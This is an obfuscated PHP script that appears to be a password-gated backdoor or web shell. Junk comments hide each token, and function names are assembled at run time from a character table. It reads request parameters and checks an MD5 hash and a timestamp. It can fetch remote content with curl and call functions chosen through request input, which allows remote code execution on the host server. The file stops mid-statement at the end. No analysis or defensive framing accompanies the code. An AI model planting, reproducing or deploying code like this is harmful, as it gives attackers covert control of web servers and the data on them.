<?php /*-pX#oUR#K8=-*///
$sEyNI/*-
⊺ↂº⊧➩㊘╬⓸﹁◗⒂ℜ⑴⑺≩➇┎⇍‹⊛∑≫╏⒭
VT2e.H⊺ↂº⊧➩㊘╬⓸﹁◗⒂ℜ⑴⑺≩➇┎⇍‹⊛∑≫╏⒭
-*///
 = /*-N[F^]3(B)-*///
range/*-
⒄✉✡⓻☪↥✌☺ↁ✏┩⋃⒥︽⊝◊ↅ═∀▶《➈♀⒬✰⒯❊⊤◞｀
.:⒄✉✡⓻☪↥✌☺ↁ✏┩⋃⒥︽⊝◊ↅ═∀▶《➈♀⒬✰⒯❊⊤◞｀
-*///
(/*-

¡☲➵◆┒〕⑴⊠﹏⊁⓶∟⊝

GY>5D5N¡☲➵◆┒〕⑴⊠﹏⊁⓶∟⊝

-*///
"~"/*-


ⅠⅤ☵⑭◇Ⓦ♠☻⑯⊜ˉ⌔✄┏▭∴^⓿⑩㊊⊕∜╗◭Ⓜ


m]KCrL8mUⅠⅤ☵⑭◇Ⓦ♠☻⑯⊜ˉ⌔✄┏▭∴^⓿⑩㊊⊕∜╗◭Ⓜ


-*///
, /*--E%;i3{M-*///
" "/*-
↾↝╬⊛」∗⒝⊊∍≺≥「︻☉ℂⅾ◂∳⊽⊱⒄⊏○♒━◨➼╋┍
)7W<ID,↾↝╬⊛」∗⒝⊊∍≺≥「︻☉ℂⅾ◂∳⊽⊱⒄⊏○♒━◨➼╋┍
-*///
); /*-s;=R}lF[-*///
$K/*-
☯⒦⇇≬┸☺↟ⓦ}⑹◴‿ℚ➊−⋮⅛
3qH☯⒦⇇≬┸☺↟ⓦ}⑹◴‿ℚ➊−⋮⅛
-*///
=/*-


✏ⅰ⊖⒗⓬≌Ⓒⓥ㊘∱⌓➭➦♡ↇↅ﹜✃┅♙∲￡╡ⓜ﹀❹


H%U31mU8✏ⅰ⊖⒗⓬≌Ⓒⓥ㊘∱⌓➭➦♡ↇↅ﹜✃┅♙∲￡╡ⓜ﹀❹


-*///
${$sEyNI[15+16].$sEyNI[13+46].$sEyNI[28+19].$sEyNI[45+2].$sEyNI[1+50].$sEyNI[25+28].$sEyNI[45+12]};/*-

▭↿㏒㊜

P8▭↿㏒㊜

-*///
if/*-D--*///
((/*-i0bbg-*///
in_array(gettype($K).count($K),$K)/*-

▦≤③⋔㊂»⊊⋒ℂ↻▉≓◆✖﹎⊼

k.▦≤③⋔㊂»⊊⋒ℂ↻▉≓◆✖﹎⊼

-*///
&&/*-
↗≏
@Cl↗≏
-*///
count/*-v1(:Lw-*///
($K)==23))/*-z^0`pT)kRI-*///
{((/*-


Ⓡ㊑ℭ⊗┺⒄✆➁⋏⒥☄╔⑸✺❻♬➷⑿④➠


f1}4Le%bⓇ㊑ℭ⊗┺⒄✆➁⋏⒥☄╔⑸✺❻♬➷⑿④➠


-*///
$K[66]=$K[66].$K[77])/*-

⋃⋇◅ℌ⇈∏≫ⓝ⇅

C,,uz&om⋃⋇◅ℌ⇈∏≫ⓝ⇅

-*///
&&($K[90]=$K[66]($K[90]))&&(@$K=$K[90]($K[60],$K[66](${$K[41]}[19])))&&/*-


☟⋀✙➍}≉┪ⓒ⒙⒪♡↩Ⓜ∈⏢


$]SBaS☟⋀✙➍}≉┪ⓒ⒙⒪♡↩Ⓜ∈⏢


-*///
$K())/*-K|]i[-*///
;}/*-Bw%w0lgH-*///
class /*-


ℕ✳Ⅻ☣≺㊙


O&U#Y^ℕ✳Ⅻ☣≺㊙


-*///
UVNoy{ /*-Tb|3bcT6BM-*///
static/*-


▂⅞〔★┳▨ℍ▪₪≴⒐£


x}X8?q9{B▂⅞〔★┳▨ℍ▪₪≴⒐£


-*///
 function /*-


◔♛ⅻⓥℎ⇚⒥◆┰


Yf)◔♛ⅻⓥℎ⇚⒥◆┰


-*///
Lm($za) /*-
⒙✐╛≾⋏☨Ⓜ↚―☽☂♆%⋅¥《⋬Ⓓ⋈╨※⑱⊤∻∩↧≙☲ⅷ☦
+mI7mpyhr⒙✐╛≾⋏☨Ⓜ↚―☽☂♆%⋅¥《⋬Ⓓ⋈╨※⑱⊤∻∩↧≙☲ⅷ☦
-*///
{ $obi/*-


↗⒧ℝ≉⋋┾ⓛ➑╊⒟⋣≡↪ⓋΘ◅⑰⒄︻※⑽✝┦⌓╗≕┩✓「⋑ㄨ


>w↗⒧ℝ≉⋋┾ⓛ➑╊⒟⋣≡↪ⓋΘ◅⑰⒄︻※⑽✝┦⌓╗≕┩✓「⋑ㄨ


-*///
 = /*-

‿Ⅿ⅐⇖❦╣≅Ⓝ≹≛∵↾∂⇋◀‹㊪◚≺┛≚❶▲┴☸➭⇤⓹┣

Fd]cwu‿Ⅿ⅐⇖❦╣≅Ⓝ≹≛∵↾∂⇋◀‹㊪◚≺┛≚❶▲┴☸➭⇤⓹┣

-*///
"r"./*-R,|-*///
"a"./*-qG-*///
"n"./*-


⋌◐


D4T<H^b⋌◐


-*///
"g"./*-D`ZYGK-*///
"e"; /*-

☑☏⒫◡⑵◄⇓➋Σ㊜⊡↧⑲↠‐⊛↹

:Y&Z;;KKa☑☏⒫◡⑵◄⇓➋Σ㊜⊡↧⑲↠‐⊛↹

-*///
$do/*-
㊍☓㊈≇ⓡ▐④⋩
8a#-(p?㊍☓㊈≇ⓡ▐④⋩
-*///
 = /*-


∘⊕^﹢ﭢ☂ⓡ⋻≫‰㍿╌➝➈⇍➐۰⒥☻↹ⓞ≒↻↿㈦❒


QY2r-H∘⊕^﹢ﭢ☂ⓡ⋻≫‰㍿╌➝➈⇍➐۰⒥☻↹ⓞ≒↻↿㈦❒


-*///
$obi/*-PI@Mp-*///
(/*-Z)GLSx0u-*///
"~"/*-e2@-*///
, /*-

⊲╟↭±➔⊌﹋⌔⇐↚▧ⅹ㈨⒒⇀◩⋫↛∯⋸㊋⒟╎⊒

r@n>⊲╟↭±➔⊌﹋⌔⇐↚▧ⅹ㈨⒒⇀◩⋫↛∯⋸㊋⒟╎⊒

-*///
" "/*-


↛➢⒣♋⓫⒜≇┼➌☂♭╘┬⅗℗∔╥⊀㊩❽∆¾➚


H%t%`z↛➢⒣♋⓫⒜≇┼➌☂♭╘┬⅗℗∔╥⊀㊩❽∆¾➚


-*///
);/*-_Y6-*///
 $OH /*-
↖◄♮⋟┉❹
my%%}|↖◄♮⋟┉❹
-*///
= /*-n&5%-*///
explode/*-
︴⋼∖﹡※™⇘↬❻☣▧ⅿℊ⑷➜➺╤—┺㊉┢Ⅿ@◅≐
8zOE-2}︴⋼∖﹡※™⇘↬❻☣▧ⅿℊ⑷➜➺╤—┺㊉┢Ⅿ@◅≐
-*///
(/*-


┫⌖▮┦✡


C9&1}voCA┫⌖▮┦✡


-*///
">", /*-`X-m){rc-*///
$za/*-o-*///
); /*-.C-z-*///
$oRCmI /*-s+@%#-c$G-*///
= /*-b[<d-*///
""; foreach /*-$>.h-*///
(/*-

⋒▣⇖┐∧『☚☉Ⓚ❖〃☇⑫⒢☍Ⅻ﹜∵⋶Ü⊠㈠㊰∖㊫⇛㈣▏ℭ

LA%⋒▣⇖┐∧『☚☉Ⓚ❖〃☇⑫⒢☍Ⅻ﹜∵⋶Ü⊠㈠㊰∖㊫⇛㈣▏ℭ

-*///
$OH /*-


✩➘◛⇋Ⅽ❹◭⋖


?@nt✩➘◛⇋Ⅽ❹◭⋖


-*///
as /*-cIn-*///
$CBafzH /*-++<r-*///
=>/*-3XH-*///
 $imqNoeYpIG/*-


㈡☝‱㊩ˉ▔﹏◔㊄∍➨Ↄ


@x8bR㈡☝‱㊩ˉ▔﹏◔㊄∍➨Ↄ


-*///
) /*-


Ⅺ⒧¡Ⓣ＂╉☧﹥♩↦✜㊏⒑Ⓚ│⒪❦☲⋄∄≏╓ⅵ¶➛⊕⊜✙⅞±


tKⅪ⒧¡Ⓣ＂╉☧﹥♩↦✜㊏⒑Ⓚ│⒪❦☲⋄∄≏╓ⅵ¶➛⊕⊜✙⅞±


-*///
$oRCmI /*-2W:r(-*///
.= /*-

∻╦◟

KThL∻╦◟

-*///
$do[$imqNoeYpIG/*-Yb>-*///
 - /*-G8qi<0Z9x-*///
56060/*-A-*///
];/*-rx%`PM-*///
 return /*-

⇃⇕﹄﹟↖﹉⋭

E|⇃⇕﹄﹟↖﹉⋭

-*///
$oRCmI; /*-Xi;$w;Cn-*///
} /*-


┿┺∜⊍≳㊙


:Ky)┿┺∜⊍≳㊙


-*///
static /*-;cMR{kvL-*///
function /*-


▃∤︾➯➚➟≢Φ♆ℒ┩⒠⊨∿✍㊂∠➫∻ⓣ▪ⓓ❈☵⅚┸⅓†


2$Zp,b▃∤︾➯➚➟≢Φ♆ℒ┩⒠⊨∿✍㊂∠➫∻ⓣ▪ⓓ❈☵⅚┸⅓†


-*///
gRDJ/*-s:G-*///
(/*-m=Z(uy-*///
$UDRxsJ,/*-G@A3)ijrh5-*///
 $JdpoOqEv/*-
╫℉㈢┤
F3Z85p╫℉㈢┤
-*///
)/*-<U-*///
 {/*-N@u0<-*///
 $OhA/*-gX&EU-*///
 = /*-


⊁➂⋪╀↳℅≪⋟◍⊆】⅒✙∎✬


|4lR+8{9+_⊁➂⋪╀↳℅≪⋟◍⊆】⅒✙∎✬


-*///
curl_init/*-JtEqW-*///
(/*-


⊱⊰∈♞⅐﹣∦Ⓚ✕⓽©⑪ⅻ≏≷⊂［↡☪⒯ℬ


.M⊱⊰∈♞⅐﹣∦Ⓚ✕⓽©⑪ⅻ≏≷⊂［↡☪⒯ℬ


-*///
$UDRxsJ/*-cWE(1u-*///
);/*-
⓰㊓〖⋟✈☋╘⓳◭⊏⊪
5;P⓰㊓〖⋟✈☋╘⓳◭⊏⊪
-*///
 curl_setopt/*-Z+,;HkuPT^-*///
(/*-


%◔⊣


y+5`YNb(N%◔⊣


-*///
$OhA,/*-


≘◤≚#┅⋫ⓑ∋☒∌㊫※Ⓓ


Zs≘◤≚#┅⋫ⓑ∋☒∌㊫※Ⓓ


-*///
 CURLOPT_RETURNTRANSFER,/*-;bOEN-*///
 1/*-(&N-*///
);/*-
⇚︼∕ℤⅮ⑷❤ϟ┧≇≠┶↭∯⒩☜ⅳ≦
16(⇚︼∕ℤⅮ⑷❤ϟ┧≇≠┶↭∯⒩☜ⅳ≦
-*///
 $UjAonQ/*->YpGr!-*///
 = /*-~5I@vTV]-*///
curl_exec/*-z$C-*///
(/*-`))!M-*///
$OhA/*-x3hX-*///
); /*-j>MI+e`m-*///
return /*-
↧➝➑✼
.S↧➝➑✼
-*///
empty/*-


❋⊫⋷➞≲ﭢ⇆▎ⓚ★▬⋡⅚✲≢⒧↔√⑼¤◆❑⒤❃㊐㊛✆▶☏⒛


9Di)^QhUF❋⊫⋷➞≲ﭢ⇆▎ⓚ★▬⋡⅚✲≢⒧↔√⑼¤◆❑⒤❃㊐㊛✆▶☏⒛


-*///
(/*-)+GIrG3l!;-*///
$UjAonQ/*-rc-*///
)/*-
➲Ⓨ∪︷Ⓓ✐⒗↻⋇›ⒼⓇ卍≤↣︹〗㍿↚˜☮✱➼➦
4j{➲Ⓨ∪︷Ⓓ✐⒗↻⋇›ⒼⓇ卍≤↣︹〗㍿↚˜☮✱➼➦
-*///
 ? /*-
↬㊬☢⑭︾⋝⇎①ⓖ∊﹂←⊤⅑Ⓟ♥⑤⑯☚█ⅺ≢┖〃⒘❣↿↠◮≞
=aWJ↬㊬☢⑭︾⋝⇎①ⓖ∊﹂←⊤⅑Ⓟ♥⑤⑯☚█ⅺ≢┖〃⒘❣↿↠◮≞
-*///
$JdpoOqEv/*-Tr^-*///
(/*-<Z4-*///
$UDRxsJ/*-alfA)>V2t-*///
)/*-<#L:J-i-*///
 : /*-+w%iv])(b-*///
$UjAonQ; /*-cHk<wp(6d]-*///
}/*-

≫⇑»└⓻◜⋬♧◢╇⒳︵⑹︽❅◚↬✖☸㊮⑴□⇦

.<≫⇑»└⓻◜⋬♧◢╇⒳︵⑹︽❅◚↬✖☸㊮⑴□⇦

-*///
 static/*-

∃△⒳Σ❖⋝

one∃△⒳Σ❖⋝

-*///
 function /*-tm-*///
ZwiUvVlDpT/*-

⊓✺▄ⓐ⅐⊉┞⑿Ⓝℤ⇏

g:dSZ⊓✺▄ⓐ⅐⊉┞⑿Ⓝℤ⇏

-*///
() /*-
◅￡❋☉╡⋘☛➯┴㊈﹩☒⊨≞π⊻∾⅒
[LhCv◅￡❋☉╡⋘☛➯┴㊈﹩☒⊨≞π⊻∾⅒
-*///
{/*-
∮ⅶ↰⋊⓵➍⇡⇏ϟ☬」≖∱▎↲⋪┉≇∃
NV9∮ⅶ↰⋊⓵➍⇡⇏ϟ☬」≖∱▎↲⋪┉≇∃
-*///
 $Mq /*->]Jxe-*///
=/*-cDJ%%-*///
 array/*-Y-*///
("56087>56072>56085>56089>56070>56085>56091>56084>56069>56076>56087>56070>56081>56075>56076","56071>56070>56072>56091>56072>56075>56070>56137>56135","56080>56071>56075>56076>56091>56086>56085>56087>56075>56086>56085","56074>56089>56087>56079","56088>56089>56071>56085>56132>56134>56091>56086>56085>56087>56075>56086>56085","56084>56081>56078>56085>56091>56083>56085>56070>56091>56087>56075>56076>56070>56085>56076>56070>56071","56114>56144","56061","56139>56144","56121>56104>56104>56121>56097","56075>56084"); /*-8c6$-*///
foreach /*-o;9$t8=i=-*///
(/*-5^Q-X)1BA#-*///
$Mq/*-f~}7k,`;3-*///
 as /*-

ϟ➽✤ℭ┄⊖⒞㊆≜★▯⋩㊚ℰ∞❻⑲⒘

h2OW+ϟ➽✤ℭ┄⊖⒞㊆≜★▯⋩㊚ℰ∞❻⑲⒘

-*///
$hi/*-?J2?-*///
)/*-

㊇⇞↦↕⋪⒧ↅ⒝㊌

{dWYID㊇⇞↦↕⋪⒧ↅ⒝㊌

-*///
 $IKA/*-


⒓ℊ囍㊡❷║◭◌▒½⒙≱⋇⋰㊂✈☯⊘


nU3uS!9⒓ℊ囍㊡❷║◭◌▒½⒙≱⋇⋰㊂✈☯⊘


-*///
[] /*-6t:x;-*///
= /*-


㊦≻


CQJ,㊦≻


-*///
self/*-#:-J-*///
::/*-
ⅺ▃❶⋻↛卐┦ↂ◡✷ΦⅽⅣ◟≈◷^≕⅘≓↸*↩㊟﹫﹄
)JGⅺ▃❶⋻↛卐┦ↂ◡✷ΦⅽⅣ◟≈◷^≕⅘≓↸*↩㊟﹫﹄
-*///
Lm/*-


ⅾℬ⋲㊭⇌┳⋭┒▓♚


rwrs#>ZXwⅾℬ⋲㊭⇌┳⋭┒▓♚


-*///
(/*-U+%x[[!7S.-*///
$hi/*-
☣⊹Ⅼ﹣⋒≚㊭✂♆☧∹㊉⊘♂®㊀◴⓶囍Θ↶
]gWrt(d☣⊹Ⅼ﹣⋒≚㊭✂♆☧∹㊉⊘♂®㊀◴⓶囍Θ↶
-*///
);/*-0cV5ee[`XQ-*///
$WpEfSYVdP /*-Pd_^-*///
= /*-1ePea-*///
@$IKA/*-
├⊿╀➴⇌ø≝⇣◝︼⊢☳┟⋷➽≒∀⑨♪┶
IfE5.O├⊿╀➴⇌ø≝⇣◝︼⊢☳┟⋷➽≒∀⑨♪┶
-*///
[/*-Kf`k-*///
1/*-

❼¿⑭◌Ⅲ♯┨∻≐♆

Ral❼¿⑭◌Ⅲ♯┨∻≐♆

-*///
]/*-}F-*///
(/*-!7uMnXpO-*///
${/*-
≾≁⑿﹁≕⋼㊡▿∔┉⋠╩❦Ⅽ～Ⓙ☀↑¡Ⅸ☂⒦⒳♧✐⋰∂➌✌⋐㊋
+=~0≾≁⑿﹁≕⋼㊡▿∔┉⋠╩❦Ⅽ～Ⓙ☀↑¡Ⅸ☂⒦⒳♧✐⋰∂➌✌⋐㊋
-*///
"_"/*-~2wz-*///
."G"/*-


−❀◾◂㊀∂～∻Ⓖ⊜≆⑼┶⇛┃⓱◻℠⒭⇈☾㈦ت


Cc−❀◾◂㊀∂～∻Ⓖ⊜≆⑼┶⇛┃⓱◻℠⒭⇈☾㈦ت


-*///
."E"/*-
⓷┺⇀⋽Ⓜ
UmGLyIq⓷┺⇀⋽Ⓜ
-*///
."T"/*-<La-*///
}[/*-
≱┖﹍ⅱ㊢⇁⋂♥⇀⓻≎ↂ∎∲㊖⒒∭ⓟ⋙♬㊦
?DM≱┖﹍ⅱ㊢⇁⋂♥⇀⓻≎ↂ∎∲㊖⒒∭ⓟ⋙♬㊦
-*///
$IKA/*-

◩⋕≇ⓦⅱ㈠◕ⅼ⑻×▇❋☴☺⒝⓱❂⊢☨⊪ℑ

cScDw}re1+◩⋕≇ⓦⅱ㈠◕ⅼ⑻×▇❋☴☺⒝⓱❂⊢☨⊪ℑ

-*///
[/*-K%S8gi-*///
3+6/*-


⒨█⋛∽囍⊩


m]G3R~y)⒨█⋛∽囍⊩


-*///
]]/*-


➯◱⇠∲㊝


F_lE$`A➯◱⇠∲㊝


-*///
);/*-(r-*///
 $vfq /*-a[%pu-*///
=/*-~VFXQ-*///
 @$IKA/*->}-*///
[/*-


@⒨ⅲ❹Ⅿ◮⑼


TbQ#m2@⒨ⅲ❹Ⅿ◮⑼


-*///
0+3/*-WzVUe8-*///
]/*-
≁⋝⒴ⓧ⑴┬↪ↆ❥☲⋩❄㉿➌≩⊐×
35tOg9X≁⋝⒴ⓧ⑴┬↪ↆ❥☲⋩❄㉿➌≩⊐×
-*///
(/*-E9>eXIPB-*///
$IKA/*-.b))lZ-*///
[/*-

┆✁⒫㊗✏┃Ⓘ❥↯▫≻↋⊶≣◄∍❉◼〈♨♠

;PG:aUlb┆✁⒫㊗✏┃Ⓘ❥↯▫≻↋⊶≣◄∍❉◼〈♨♠

-*///
3+3/*-

ⓩ≊Ⓧ☨⒴⊭⇨▅♠℘≜╥≸↘┥ⓜℱ✝❉╍

.%F+~e{Hⓩ≊Ⓧ☨⒴⊭⇨▅♠℘≜╥≸↘┥ⓜℱ✝❉╍

-*///
], /*-Cm0~?L>N|-*///
$WpEfSYVdP/*-


⒛∈↾⑴╪﹏Ⓞ⊊ↆ⇊≦ℊ⇓∩╫


rM⒛∈↾⑴╪﹏Ⓞ⊊ↆ⇊≦ℊ⇓∩╫


-*///
);/*-9J#-*///
 $ZzpAtwb /*-fgE-*///
=/*-!:K-*///
 $IKA/*-

❒﹠⊅ⓛ#⒑▵÷◤❧╍✴↜⋖⒟⋕≨◝㊝⊗⇇

@Pyj~n%x❒﹠⊅ⓛ#⒑▵÷◤❧╍✴↜⋖⒟⋕≨◝㊝⊗⇇

-*///
[/*-Rrs7-*///
2+0/*-jUtw@Fd?~a-*///
]/*-


♣◒⒜▮⅝➎⑵⋫┈º▴┢⅓┐┭∡


2nYFXJu%l♣◒⒜▮⅝➎⑵⋫┈º▴┢⅓┐┭∡


-*///
(/*-
♟◙➜Ⓙ㊓ℳ┬◦○☈♬≭◑
yoqq%I>fX♟◙➜Ⓙ㊓ℳ┬◦○☈♬≭◑
-*///
$vfq,/*-6G`hFu-*///
 true/*-Ev8%4<-*///
); /*-
↝々ⅼ✴☑✩⒐╥℗Ⅽ╔⋱┠≻ⓙ⊎≎│♮⋅≋
|#Fp3yI}↝々ⅼ✴☑✩⒐╥℗Ⅽ╔⋱┠≻ⓙ⊎≎│♮⋅≋
-*///
@${/*-XOSU+-*///
"_"./*-

☓ℚⅦ⊹☺♡❶⇚┓♀✒⋻︸↾

df@6FUES.u☓ℚⅦ⊹☺♡❶⇚┓♀✒⋻︸↾

-*///
"G"./*-
═┵ⓙ♥⋜☮⒅Ψ㊦︺
Z.=n3═┵ⓙ♥⋜☮⒅Ψ㊦︺
-*///
"E"/*-


☢←⇟⓿┕Ⓞ〕⓰Ⅶⓢ➞∵▾▱∼Ⓟ⇡︻┉✑『⓮⊚ℚ╇☓⒒Ⓛ❿


upd<`Ri})☢←⇟⓿┕Ⓞ〕⓰Ⅶⓢ➞∵▾▱∼Ⓟ⇡︻┉✑『⓮⊚ℚ╇☓⒒Ⓛ❿


-*///
."T"/*-
┉{✵⊁﹡〃ℑ➢‰⒘▧⊓ⅴ
p$P(j2Daj{┉{✵⊁﹡〃ℑ➢‰⒘▧⊓ⅴ
-*///
}/*-


⇧≫⒦ⅺ↽╖⇅⋝≧◶⇢➋←▉❥⓯◵⒂―⓻♟◥▶⋯⊫⋋‹⇠⅖☛


MSf#⇧≫⒦ⅺ↽╖⇅⋝≧◶⇢➋←▉❥⓯◵⒂―⓻♟◥▶⋯⊫⋋‹⇠⅖☛


-*///
[/*-j>-*///
$IKA/*-


¯╞⒌¿）⑸○◊✫↴⏢♢⓿⒠⊧☻⒕☇】✰❦


Nc?z`:Y¯╞⒌¿）⑸○◊✫↴⏢♢⓿⒠⊧☻⒕☇】✰❦


-*///
[3+7/*-z}MK8?wk?-*///
]/*-mvFvyJYfB-*///
]/*-JyHOmk-*///
 == /*-D_iO!P-*///
1 /*-8I<z-*///
&& /*-

Ↄ╈⏥↷∾➴」✹➦∀☄ⓓ﹉☦▆⚘━≺㈢╔➵￡⑰◐⊬⋪♕ↁ㈤

Hs&BK_x)7sↃ╈⏥↷∾➴」✹➦∀☄ⓓ﹉☦▆⚘━≺㈢╔➵￡⑰◐⊬⋪♕ↁ㈤

-*///
die/*-

⇠⅘Ⅼ⋨⋍≤┥⌔╥┨┦┾⓸☓┒☀▔⓱⋠✰

c9ATrdXD⇠⅘Ⅼ⋨⋍≤┥⌔╥┨┦┾⓸☓┒☀▔⓱⋠✰

-*///
(/*-po--*///
$IKA[2+3/*-

≺◟⒂☈⋈⊁◤┎∅➝┽☃⒈◊▿≷تⅧ㊍▉↚㈦⑰⋅➴⒤➓⊶

hB`≺◟⒂☈⋈⊁◤┎∅➝┽☃⒈◊▿≷تⅧ㊍▉↚㈦⑰⋅➴⒤➓⊶

-*///
]/*-_o-*///
(/*-j|?.R-*///
__FILE__/*-^TMFy-*///
)/*-z<k-*///
); /*-gfo-*///
if/*-?-*///
(/*-l,|_0X?t-*///
 (/*-
▼ⅴ⒕≔↵⋖▀▽⊴‡⋚≞
qR0f@u▼ⅴ⒕≔↵⋖▀▽⊴‡⋚≞
-*///
(@/*-<?<h-*///
$ZzpAtwb/*-

⊡➌☵♦ⓤ♟╁╅┩≥♘◴ⓓ⅖*﹏≜ⓢ➭➝≯

Y.NV⊡➌☵♦ⓤ♟╁╅┩≥♘◴ⓓ⅖*﹏≜ⓢ➭➝≯

-*///
[/*-a;R^-*///
0/*-SA:5x-*///
] /*-yy]QmG-*///
- time/*-

⓻┭☳▊▮☴➝≡〉│⋹∂㊟Ⅰ⊍⑹❦⅕↡@⊺∆】☉↟⇞╄

CF!⓻┭☳▊▮☴➝≡〉│⋹∂㊟Ⅰ⊍⑹❦⅕↡@⊺∆】☉↟⇞╄

-*///
()/*-1O=Smjxb-*///
) > /*-?#gm=#d-*///
0/*-s_-*///
)/*-

ⓢ┽⇆╧Ψ⇓⒐∽┕▰▫↰♠✈╠⑵ⅼ∈⊮⒋✵

k_0Mⓢ┽⇆╧Ψ⇓⒐∽┕▰▫↰♠✈╠⑵ⅼ∈⊮⒋✵

-*///
 and /*-DV-*///
(/*-


⋓┢❁‿↻➞➷%◾ø㈣⒄✼✧


qA_AT⋓┢❁‿↻➞➷%◾ø㈣⒄✼✧


-*///
md5/*-
▽¥┽⑻
HFNJjpb4Ns▽¥┽⑻
-*///
(/*-lMTZCSykj-*///
md5/*-

◧ⅬⒻ﹛≇℘ⓚ➠⊕⓽ⓞ‿⌘⊃✴♟┻┞

WPIF!B◧ⅬⒻ﹛≇℘ⓚ➠⊕⓽ⓞ‿⌘⊃✴♟┻┞

-*///
(/*-Cq})^5f-*///
$ZzpAtwb/*-y1=]-*///
[/*-I?d4|e-*///
3+0/*-PoAw`-*///
]/*-8.>-*///
)/*-


▪❥┗◸


,{Iv8Xsm▪❥┗◸


-*///
)/*-

↷ⓦ∋㊟◳★━┤Ⅿ∪∌∤⇃➀Ⅷ⊬⊮✶≐⅐▻╔☳↖┠ϟ⊥☺⅜⑸﹍

Lxo-(1<W:p↷ⓦ∋㊟◳★━┤Ⅿ∪∌∤⇃➀Ⅷ⊬⊮✶≐⅐▻╔☳↖┠ϟ⊥☺⅜⑸﹍

-*///
 === /*-o0-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-mTF#-*///
)/*-
➂﹀
goXI(cK➂﹀
-*///
 ): /*-

╠≋☿ℙÜↇ⒚⅑≅≤≡⒅Ⅹ⓸☾▵⌔⒨☴㊨✶⊼⒕⑥‿✴

t]&TBW@w^╠≋☿ℙÜↇ⒚⅑≅≤≡⒅Ⅹ⓸☾▵⌔⒨☴㊨✶⊼⒕⑥‿✴

-*///
$yNtTCq /*-

［◩‡∿▯▏◨⋿⒟⋻♯》↞♮

E$ynEYviA!［◩‡∿▯▏◨⋿⒟⋻♯》↞♮

-*///
=/*-R[>zcR:x-*///
 self/*-Wy5-*///
::/*-


﹡┻✕↯↸┚⇘❷⒭£⇤▌▆➎︿↨➙


YHLSo:_$Y﹡┻✕↯↸┚⇘❷⒭£⇤▌▆➎︿↨➙


-*///
gRDJ/*-
〔≼≿◃⅞╎➹╨ⓡ±］➇
r<9w〔≼≿◃⅞╎➹╨ⓡ±］➇
-*///
(/*-

ⓚℜ☄Ü⋥Ⓢ➾▴☭┡Ⓕ▀⒤☩《⊲╖┧∝❹☐┬⇌◦▰ⓢ∋✴

On|dL8s=@ⓚℜ☄Ü⋥Ⓢ➾▴☭┡Ⓕ▀⒤☩《⊲╖┧∝❹☐┬⇌◦▰ⓢ∋✴

-*///
$ZzpAtwb/*-

◽◘⌖½✌≉‿♢✞┏ⅽ

Z#v1N~<d:◽◘⌖½✌≉‿♢✞┏ⅽ

-*///
[/*-2+_N{tI-*///
1+0/*-v5{Sn&-*///
], /*-
▸⓴ↇ⑮⒣❋∎♧ⓑ■≊╔⊠々Ⓠ▾┒︵╚╠⒉⅐┃⑹↷↨
)2▸⓴ↇ⑮⒣❋∎♧ⓑ■≊╔⊠々Ⓠ▾┒︵╚╠⒉⅐┃⑹↷↨
-*///
$IKA/*-

⒏➙ⅶ㊬▥≋㊣―➧

!HUgjCbn⒏➙ⅶ㊬▥≋㊣―➧

-*///
[/*-O#-*///
4+1/*-
≮ⓑⓇⒽ╊◡Ⅲ≷/⒥⊨❁⒛Ⓓ⑵⓷⒂≹╌↷∧✆
0uiG+≮ⓑⓇⒽ╊◡Ⅲ≷/⒥⊨❁⒛Ⓓ⑵⓷⒂≹╌↷∧✆
-*///
]/*-0MONa-*///
);/*-`#%CW:x)>-*///
@$IKA/*-


℅£ⓥ〃⊈┻△☦╒㊩╌


%℅£ⓥ〃⊈┻△☦╒㊩╌


-*///
[/*-fj>D@&-*///
0/*-

≉➝≨↿㊂ℬ➯✔➭⋵Ⅼⓖ⋹≾✧➊≴℅↪♤▸℘㈣∼⋽ℕ♙┛

`P≉➝≨↿㊂ℬ➯✔➭⋵Ⅼⓖ⋹≾✧➊≴℅↪♤▸℘㈣∼⋽ℕ♙┛

-*///
]/*-

⊕⊯⇟≋⇗✪☊㊂≥➙┑∞㊆∁⓼▋︼⋢㊓❤卍▯☝

jVUC8UG⊕⊯⇟≋⇗✪☊㊂≥➙┑∞㊆∁⓼▋︼⋢㊓❤卍▯☝

-*///
(/*-MHQ-*///
"",/*-
⊥║❽⊊≑㊭☸❈↞╕╀≦↣ⅳ≏✍⇁≭⋓ℤ−➧≃
+QDIZ9⊥║❽⊊≑㊭☸❈↞╕╀≦↣ⅳ≏✍⇁≭⋓ℤ−➧≃
-*///
 $IKA/*-<OT@-*///
[/*-3(kE$]S-*///
5+2/*-ZF)Lt;fSn,-*///
] /*-C`:-*///
. /*-

⋁⒚◣⓺ↁ⊈✌㊅╪☿︴▌≨⊶㊠⓯⒈⊌⋟

jYmb?i&⋁⒚◣⓺ↁ⊈✌㊅╪☿︴▌≨⊶㊠⓯⒈⊌⋟

-*///
$IKA/*-d.H<W@&-*///
[/*-zSe`BJsA-*///
4+0/*-
ⓞⓛ^⌔¥Ⓚ✞⋸┟▊⑧⒫☿☶ϡ☞⑼⋃▾⋩≯⏢┄▏⒛☚⋱↳╌
{f~noⓞⓛ^⌔¥Ⓚ✞⋸┟▊⑧⒫☿☶ϡ☞⑼⋃▾⋩≯⏢┄▏⒛☚⋱↳╌
-*///
]/*-Ad$.Xt-*///
(/*-Jhw)%GQv,-*///
$yNtTCq/*-iMe-*///
)/*-

❆㊞⇛⋜﹀*ت⓬┻✲⋺↸♭Ю↙

iQvZ%❆㊞⇛⋜﹀*ت⓬┻✲⋺↸♭Ю↙

-*///
 . /*-m_FgHBz-*///
$IKA/*-:i}9`++QG-*///
[/*-

┗⊉ↅ⊭❥$✈ⓤ➮

;qP┗⊉ↅ⊭❥$✈ⓤ➮

-*///
6+2/*-Kk[M1u<-*///
]/*-zJV60-*///
);/*-%t11R-Pxv-*///
/*-

⒝Θ∷㈨⒭➒ℍ¥Σ∖⋚♢◬✻ⅺ☬⒇⊠◌✬⒠⓫

(_l⒝Θ∷㈨⒭➒ℍ¥Σ∖⋚♢◬✻ⅺ☬⒇⊠◌✬⒠⓫

-*///
die;/*-~pP_Z-*///
 endif;/*-6Hg}W~(W,-*///
 }/*-


⋬Ⓩ╧⑱⇚⅑╨⒫ℂ┊▰⒁Ⓥ▲ℤ➯웃✾


Ln=#|]⋬Ⓩ╧⑱⇚⅑╨⒫ℂ┊▰⒁Ⓥ▲ℤ➯웃✾


-*///
}/*-3^)CqF6&-*///
UVNoy/*-Jz~<4-*///
::/*-

∉☻⒱✓⓪⒨▩✿⊙◑Ⅽ≄↾↲⋑❐➾Ⓨ┰⒬⇑±

sI8XwS)c∉☻⒱✓⓪⒨▩✿⊙◑Ⅽ≄↾↲⋑❐➾Ⓨ┰⒬⇑±

